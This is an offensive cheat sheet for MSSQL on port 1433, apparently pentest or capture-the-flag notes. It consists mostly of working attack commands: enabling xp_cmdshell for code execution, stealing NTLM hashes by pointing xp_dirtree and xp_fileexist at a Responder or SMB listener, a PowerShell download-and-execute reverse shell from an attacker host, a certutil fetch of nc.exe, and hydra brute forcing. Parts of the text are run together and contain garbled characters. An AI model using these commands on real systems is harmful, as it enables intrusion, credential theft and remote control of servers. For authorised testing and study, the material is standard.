ðŦĒPort 1433 (MSSQL)
impacket
mssqlclient.py -windows-auth reporting@10.10.10.125
SQL>shell
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
querier\mssql-svcsqsh
sqsh -S mssql -D MyDB -U DOMAIN\\testuser -P MyTestingClearPassword1mssql commands
select IS_SRVROLEMEMBER (â 'sysadmin'â ) # check permisionsresponder
steal hashes of the SQL service account by using xp_dirtree or xp_fileexist.
en kali:
responder -I tun0 -rven windows
SQL>exec xp_dirtree '\\10.10.14.6\share\file' SQL>exec xp_fileexist '\\10.10.16.2\share\file'
mssql reverse shell
SQL> xp_cmdshell powershell iex(new-object net.webclient).downloadstring(\"http://10.10.14.6/Invoke-PowerShellTcp.ps1\")nmap nse
ms-sql-brute.nse
ms-sql-config.nse
ms-sql-dac.nse
ms-sql-dump-hashes.nse
ms-sql-empty-password.nse
ms-sql-hasdbaccess.nse
ms-sql-info.nse
ms-sql-ntlm-info.nse
ms-sql-query.nse
ms-sql-tables.nse
ms-sql-xp-cmdshell.nseGet information
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>Brute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mssql -vV -I -uHaving credentials
mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>
# Once logged in you can run queries:
SQL> select @@ version;
# Steal NTLM hash
sudo smbserver.py -smb2support liodeus .
SQL> exec master..xp_dirtree '\\<IP>\liodeus\' # Steal the NTLM hash, crack it with john or hashcat
# Try to enable code execution
SQL> enable_xp_cmdshell
# Execute code
SQL> xp_cmdshell whoami /all
SQL> xp_cmdshell certutil.exe -urlcache -split -f http://<IP>/nc.exeManual exploit
Cheatsheet :
- https://www.asafety.fr/mssql-injection-cheat-sheet/Last updated